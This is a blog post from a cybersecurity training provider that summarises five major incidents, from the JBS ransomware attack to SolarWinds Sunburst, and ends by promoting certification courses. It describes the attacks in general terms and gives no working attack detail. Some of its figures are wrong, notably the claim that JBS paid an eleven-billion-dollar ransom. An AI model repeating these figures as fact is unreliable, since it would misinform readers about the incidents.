Biggest Hacks of 2021

In 2021 hackers successfully executed thousands of hacks.  The biggest hacks made worldwide headlines and caused severe disruptions, from causing a gasoline supply panic to causing critical vulnerabilities in the world’s foremost technology providers. 

According to the Identity Theft Research Center (ITRC), the number of data breaches have increased by 17% since 2020.  IBM reported that the average cost of a data breach is now over four million dollars.  Cyber-insurance payments are also on the rise.  2021 broke records with the largest cyber-insurance payout to date of six million dollars.

These trends indicate that hackers are becoming more sophisticated, bolder, and more skilled.  Unfortunately, hackers are showing no signs of slowing down, which is why organizations are desperate for trained cybersecurity professionals.

Here are 2021’s biggest hacks based on their financial, reputational, or privacy impact. 

5. JBS

The JBS hack demonstrated how hackers are willing to target any type of industry.  Hackers will target any organization where they can find and exploit and make some money, usually through ransomware.

JBS is one of the world’s largest meat packing companies.  They maintain meat packaging facilities on most continents.

On May 30 2021 JBS was targeted by a ransomware attack which led to the shutdown of 14 meat processing facilities across the U.S. 

The Russian-Based ransomware gang known as REvil was responsible for the attack according to the FBI.  Revil has been responsible for other high profile ransomware attacks in the past, including the Quanta hack targeting Apple.  REvil is a highly sophisticated hacking group that operates like a mature business.  They have an HR department, have an operations policy, and set quarterly goals.

This group was able to steal more than five Terabytes of information over two months.  They then installed ransomware on critical systems linked to meat distribution which completed shut down fourteen meat processing plants.  

The loss of revenue and supply chain disruptions from the shutdown of these facilities was catastrophic for the company.  JBS responded by paying the requested ransom of eleven billion dollars in Bitcoin to the hackers.  The CEO of JBS said “…we felt this decision had to be made to prevent any potential risk for our customers.“

4. Colonial Pipeline

Most people never directly experience the effects of a hack.  Sure, they read about them in the news, but those hackers never affect them, right?  Well the Colonial Pipeline hack directly affected millions of people along the U.S. East Coast with gas shortages and price spikes. 

Colonial Pipeline is responsible for 45% of all gasoline, diesel, and jet fuel along the east coast of the U.S. This company runs thousands of miles of pipelines for these fuel sources to major refineries and fueling stations.  Hundreds of gas stations on the east coast rely on Colonial Pipeline for day-to-day operations.

Colonial Pipeline was targeted by a cybersecurity attack on April 29th 2021.  Hackers used a compromised password to login to Colonial Pipeline’s network directly through a VPN. 

Ransomware was installed on the systems used to control fuel distribution across the East Coast.  Ransomware works by encrypting data using strong encryption algorithms.  This makes it nearly impossible for the victims to access their own data.  Hackers will then ask for a ransom, usually in the form of cryptocurrency, to decrypt the data. 

The hackers notified Colonial Pipeline that their systems were compromised on May 7th, after they had downloaded several gigabytes of data.

DarkSide, an Eastern European hacking group was the hacking group responsible for the attack.  It is believed that DarkSide obtained a valid but unused password from a list of leaked passwords on the darkweb.  They demanded 4.4 million dollars in Bitcoin as ransom.

Hackers not only encrypted the data but they threatened to release sensitive information in a technique known as double extortion.

Colonial Pipeline paid the ransom to avoid shutdown of their operations and massive fuel shortages.  Paying the ransom is usually the last resort for extorted companies because there is no guarantee that hackers will unlock the files they have encrypted. 

Within a few months, the U.S. Justice Department was able to recover all of the Bitcoin paid to the hackers.  Though the value of that Bitcoin dropped to 2.6 million dollars at the time of recovery.

3. Microsoft Exchange Server

One of the most damaging hacks of 2021 was the widespread compromise of Microsoft Exchange servers.  Chinese state-sponsored hacking groups used a series of four zero day vulnerabilities collectively known as ProxyLogon to compromise Microsoft exchange servers.

This vulnerability targeted on-premises exchange servers, those that were controlled locally by the organization.  The nature of the hack meant that Microsoft Office 365 exchange servers were spared.

Hackers would scan the internet for exchange servers and then use the ProxyLogon vulnerability to compromise the exchange servers.  Anyone running an on-premise exchange server was affected by this vulnerability.  This included organizations from small businesses to large corporations.

The vulnerability allowed hackers to install a web shell onto the exchange server.  A web shell allows a user to input commands to a server remotely.  This meant that hackers were able to input commands to compromised machines to steal data, install ransomware, or command the machines to mine cryptocurrency. 

Microsoft first became aware of the vulnerabilities in January and released emergency patches in March.  This meant that hackers were able to access information for months before the patch was even distributed.  It took many organizations even longer to apply the patch.  On top of that, the patch only protected against future vulnerabilities and did not close the vulnerability for already compromised machines.

Microsoft and the U.S. Government both blame Chinese sponsored hacking group Hafnium for the attack.  Hafnium is a well known advanced persistent threat (APT) group which has a reputation for targeting U.S. based organizations.   

2. Log4j

Java is one of the core technologies of the internet.  So, when a major hack involves Java, it is bound to have far reaching consequences. 

A zero day vulnerability in the Log4j Java library is currently being actively exploited.  This vulnerability is known as Log4Shell and allows hackers to remotely execute code on machines running the Log4j library (this is commonly referred to as a remote execution flaw (RCE). 

The problem lies in Log4j, a ubiquitous, open source Apache logging framework that developers use to keep a record of activity within an application.

All an attacker has to do to exploit Log4Shell is to send a malicious code string to the target system.  This string will be logged by systems running Log4j version 2.0 or higher.  The exploit lets attackers load Java code on a system, which will allow them to take control.

Java libraries are often used by web applications and enterprise systems.  The popular game Minecraft relies on Java libraries and has been severely affected by the Log4Shell vulnerability.  Microsoft, which owns Minecraft, developed patches to fix the vulnerability shortly after its discovery. 

Hackers are rushing to exploit this vulnerability and it is currently being executed by botnets.  The Mirai botnet, which has been used in the past in conjunction with other high profile attacks, is known to be actively exploiting Log4Shell.

This vulnerability is widespread and easy for hackers to exploit.  These factors combined make it very dangerous for organizations with less robust security teams.  Some organizations may not even realize they are affected by this vulnerability for several months or may lack the resources to resolve the vulnerability once it is discovered. 

1. Solar Winds

The SolarWinds Hack showed us what happens when a popular security tool becomes the target of a hack.  Organizations trust security tools to keep their environments safe from hackers.  It can be a shock when the tool designed to protect is the thing that hackers are using to steal your data.

SolarWinds, a company that sells IT monitoring and management tools was targeted by a Russian hacker group called Nobelium in 2019.  Nobelium compromised the SolarWinds Orion platform.  This platform is used to provide an all-in-one security solution with network monitoring, security management, and IT operations. 

The SolarWinds Orion Platform was compromised by an attack known as Sunburst.  Nobelium was able to introduce a special dynamic link library (DLL) into the Orion platform.  This DLL went undetected by SolarWinds and was introduced during the software development process.  The DLL was incorporated into the platform and signed as valid code. 

This meant that Solar Winds customers would receive legitimate software updates from SolarWinds which included the malicious code known as Sunburst.  Up to 18,000 customers, including government agencies, used Orion including:
– Microsoft
– Cisco
– Deloitte
– State, local, and federal government agencies

Timeline of Events

The Sunburst code remained undetected for more than a year, so it can be confusing to keep track of when each major event occurred.  Here’s a timeline of the major events:
– September 2019: Nobelium gains unauthorized access to SolarWinds network
– October 2019: Threat actors test initial code injection into Orion
– February 20 2020: Malicious code known as Sunburst injected into Orion
– March 26, 2020: SolarWinds unknowingly starts sending out Orion software updates with hacked code
– December 16 2020: The Sunburst attack was discovered by FireEye

FireEye, a cybersecurity firm, discovered the malware in December of 2020, over one year after hackers compromised Orion.  This means that Nobelium had a working backdoor to any organization using the Orion platform for more than a year. 

Some companies still use versions of SolarWinds Orion with the Sunburst backdoor.  The extent of the Solar Winds hack is still unknown.

The Need for Experienced Professionals

One thing that all of these hacks have in common is that they all demonstrate that there is a lot of work to protect against hacking attempts.  Organizations need the right tools and, more importantly, the right people to keep their data secure.

That’s why trained cybersecurity professionals are needed to protect against these hacking attempts.  Organizations can barely keep up with hacking attempts utilizing the current cyber workforce.  This has led to a near zero percent unemployment rate in the cybersecurity industry in 2021.  This huge demand for certified professionals is expected to continue in 2022, making now the perfect time to earn a new professional certification.

Whether you are an experienced cybersecurity professional or just getting into the field, Cyberkraft has training options to fit your career.  Checkout our live training bootcamps or self-paced courses to jumpstart your career with a new certification. 

Related Articles